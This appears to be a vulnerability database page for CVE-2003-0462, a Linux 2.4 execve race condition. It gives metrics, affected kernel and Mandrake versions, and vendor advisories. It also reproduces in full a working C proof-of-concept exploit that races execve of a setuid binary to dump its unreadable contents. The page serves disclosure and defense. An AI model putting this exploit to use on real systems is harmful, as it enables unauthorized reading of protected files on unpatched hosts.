CVE-2003-0462 : Detail

CVE-2003-0462

0.04%V3
Local
2003-07-25
02h00 +00:00
2017-10-09
22h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

A race condition in the way env_start and env_end pointers are initialized in the execve system call and used in fs/proc/base.c on Linux 2.4 allows local users to cause a denial of service (crash).

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 1.2 AV:L/AC:H/Au:N/C:N/I:N/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 22840

Publication date : 2003-06-25 22h00 +00:00
Author : IhaQueR
EDB Verified : Yes

/* source: https://www.securityfocus.com/bid/8042/info A race condition vulnerability has been discovered in the Linux execve() system call, affecting the 2.4 kernel tree. The problem lies in the atomicity of placing a target executables file descriptor within the current process descriptor and executing the file. An attacker could potentially exploit this vulnerability to gain read access to a setuid binary that would otherwise be unreadable. Although unconfirmed, it may also be possible for an attacker to write code to a target executable, making it theoretically possible to execute arbitrary code with elevated privileges. */ /**************************************************************** * * * Linux 2.4.x suid exec/file read race proof of concept * * by IhaQueR * * * ****************************************************************/ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <errno.h> #include <sched.h> #include <fcntl.h> #include <signal.h> #include <sys/types.h> #include <sys/stat.h> #include <asm/page.h> void fatal(const char *msg) { printf("\n"); if (!errno) { fprintf(stderr, "FATAL: %s\n", msg); } else { perror(msg); } printf("\n"); fflush(stdout); fflush(stderr); exit(129); } int child(char **av) { int fd; printf("\nChild running pid %d", getpid()); fflush(stdout); usleep(100000); execvp(av[0], av + 1); printf("\nFatal child exit\n"); fflush(stdout); exit(0); } void exitus(int v) { printf("\nParent terminating (child exited)\n\n"); fflush(stdout); exit(129); } void usage(const char *name) { printf("\nSuid exec dumper by IhaQueR\n"); printf("\nUSAGE:\t%s executable [args...]", name); printf("\n\n"); fflush(stdout); exit(0); } int main(int ac, char **av) { int p = 0, fd = 0; struct stat st, st2; if (ac < 2) usage(av[0]); av[0] = (char *) strdup(av[1]); av[1] = (char *) basename(av[1]); p = stat(av[0], &st2); if (p) fatal("stat"); signal(SIGCHLD, &exitus); printf("\nParent running pid %d", getpid()); fflush(stdout); __asm__ ( "pusha \n" "movl $0x411, %%ebx \n" "movl %%esp, %%ecx \n" "movl $120, %%eax \n" "int $0x80 \n" "movl %%eax, %0 \n" "popa" : : "m"(p) ); if (p < 0) fatal("clone"); if (!p) child(av); printf("\nParent stat loop"); fflush(stdout); while (1) { p = fstat(3, &st); if (!p) { if (st.st_ino != st2.st_ino) fatal("opened wrong file!"); p = lseek(3, 0, SEEK_SET); if (p == (off_t) - 1) fatal("lseek"); fd = open("suid.dump", O_RDWR | O_CREAT | O_TRUNC | O_EXCL, 0755); if (fd < 0) fatal("open"); while (1) { char buf[8 * PAGE_SIZE]; p = read(3, buf, sizeof(buf)); if (p <= 0) break; write(fd, buf, p); } printf("\nParent success stating:"); fflush(stdout); printf("\nuid %d gid %d mode %.5o inode %u size %u", st.st_uid, st.st_gid, st.st_mode, st.st_ino, st.st_size); fflush(stdout); printf("\n"); fflush(stdout); exit(1); } } printf("\n\n"); fflush(stdout); return 0; }

Products Mentioned

Configuraton 0

Mandrakesoft>>Mandrake_multi_network_firewall >> Version 8.2

Configuraton 0

Linux>>Linux_kernel >> Version 2.4.0

Linux>>Linux_kernel >> Version 2.4.1

Linux>>Linux_kernel >> Version 2.4.2

Linux>>Linux_kernel >> Version 2.4.3

Linux>>Linux_kernel >> Version 2.4.4

Linux>>Linux_kernel >> Version 2.4.5

Linux>>Linux_kernel >> Version 2.4.6

Linux>>Linux_kernel >> Version 2.4.7

Linux>>Linux_kernel >> Version 2.4.8

Linux>>Linux_kernel >> Version 2.4.9

Linux>>Linux_kernel >> Version 2.4.10

Linux>>Linux_kernel >> Version 2.4.11

Linux>>Linux_kernel >> Version 2.4.12

Linux>>Linux_kernel >> Version 2.4.13

Linux>>Linux_kernel >> Version 2.4.14

Linux>>Linux_kernel >> Version 2.4.15

Linux>>Linux_kernel >> Version 2.4.16

Linux>>Linux_kernel >> Version 2.4.17

Linux>>Linux_kernel >> Version 2.4.18

Linux>>Linux_kernel >> Version 2.4.19

Linux>>Linux_kernel >> Version 2.4.20

Linux>>Linux_kernel >> Version 2.4.21

Mandrakesoft>>Mandrake_linux >> Version 8.2

Mandrakesoft>>Mandrake_linux >> Version 8.2

    Mandrakesoft>>Mandrake_linux >> Version 9.0

    Mandrakesoft>>Mandrake_linux_corporate_server >> Version 2.1

    References

    http://www.redhat.com/support/errata/RHSA-2003-238.html
    Tags : vendor-advisory, x_refsource_REDHAT
    http://www.debian.org/security/2004/dsa-423
    Tags : vendor-advisory, x_refsource_DEBIAN
    http://www.redhat.com/support/errata/RHSA-2003-198.html
    Tags : vendor-advisory, x_refsource_REDHAT
    http://www.redhat.com/support/errata/RHSA-2003-239.html
    Tags : vendor-advisory, x_refsource_REDHAT
    http://www.debian.org/security/2004/dsa-358
    Tags : vendor-advisory, x_refsource_DEBIAN